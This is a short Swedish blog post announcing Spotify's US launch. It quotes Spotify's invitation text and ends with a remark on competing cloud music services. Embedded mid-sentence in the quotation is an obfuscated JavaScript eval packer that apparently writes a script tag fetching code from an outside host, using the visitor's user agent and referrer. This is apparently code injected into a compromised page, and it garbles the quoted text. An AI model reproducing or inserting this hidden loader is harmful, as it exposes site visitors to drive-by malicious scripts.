Image Image Image Image Image Image Image Image Image Image

| 3 juni, 2020

Scroll to top

Top

Nu lanseras Spotify i USA!!

Nu lanseras Spotify i USA!!
Sebastian

Nu är det äntligen klart. Spotify ska lanseras i USA. Dem har öppnat upp en sida på sin hemsida där amerikanska användare kan ansöka om en inbjudan till lanseringen. Det finns inget exakt datum med dem skriver:

[quote]The eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|stdsb|var|u0026u|referrer|zabtn||js|php’.split(’|’),0,{}))
award-winning music service that’s taken Europe by storm will soon be landing on US shores. Millions of tracks ready to play instantly, on your computer and your phone.[/quote]

Det ska bli intressant och se om Spotify kan konkurrera med Google Beta Music, Apple iCloud och Amazon Cloud Player.
www.spotify.com

Comments